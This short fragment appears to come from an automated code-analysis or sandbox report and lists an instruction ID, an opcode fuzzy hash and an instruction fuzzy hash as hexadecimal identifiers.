                • Instruction ID: 0fd3764f6c4d63637f5acd89831e2a8ba7c8e68f8795b74e3fe931ec4df81cd3
                • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                • Instruction Fuzzy Hash: 3001A77010CB0C8FD744EF0CE051AA6B3E0FB99324F10052EE58AC3661D632E882CB42